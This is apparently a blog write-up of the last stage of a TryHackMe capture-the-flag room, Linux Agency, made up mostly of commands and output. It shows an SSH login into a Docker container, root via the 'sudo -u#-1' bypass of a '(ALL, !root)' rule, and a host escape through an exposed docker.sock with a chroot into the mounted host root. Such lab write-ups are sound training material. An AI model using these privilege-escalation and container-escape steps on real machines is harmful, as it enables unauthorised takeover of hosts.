Game Zone

This Room will help you to sharpen your Linux Skills and help you to learn basic privilege escalation in a HITMAN theme. So, pack your briefcase and grab your SilverBallers as its gonna be a tough ride.

This is Linux Agency from THM. It doesn’t seem to have a rating? There are 31 flags which mostly involve basic concepts to grab, then you escalate through a bunch of users mostly with GTFOBins techniques. It’s only the last part I’m going to mention.

Final Steps

As maya, linpeas shows us this:

root 1395 0.0 0.3 404800 3432 ? Sl 01:41 0:00 _ /usr/bin/docker-proxy -proto tcp -host-ip 127.0.0.1 -host-port 2222 -container-ip 172.17.0.2 -container-port 22

We log in as robert using his SSH key and passphrase we found earlier:

maya@linuxagency:~/old_robert_ssh$ ssh -p 2222 -i id_rsa robert@localhost
robert@localhosts password: 
Last login: Tue Jan 12 17:02:07 2021 from 172.17.0.1
robert@ec96850005d6:~$

We’re in a docker container.

We can become root in the container:

robert@ec96850005d6:~$ sudo -l
Matching Defaults entries for robert on ec96850005d6:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User robert may run the following commands on ec96850005d6:
    (ALL, !root) NOPASSWD: /bin/bash
robert@ec96850005d6:~$ sudo -u#-1 /bin/bash
root@ec96850005d6:~#

And then escape it:

root@ec96850005d6:/root# /tmp/docker -H unix:///run/docker.sock images -a

There is one called mangoman.

root@ec96850005d6:/root# /tmp/docker run -it -v /:/host mangoman chroot /host/ bash
root@7aebfd2b211c:/#

Note: docker wasn’t in the path, it was in /tmp for some reason; probably to make it harder. Linpeas pointed out run/docker.sock.

root@7aebfd2b211c:~# cat message.txt 
Nice Job 47
We are really impressed with your skills

Hope you enjoyed your journey!!

Your directors of ICA 
   0z09e & Xyan1d3


========>0z09e
https://github.com/0z09e
https://twitter.com/0z09e

========>Xyan1d3
https://twitter.com/xyan1d3
https://github.com/xyan1d3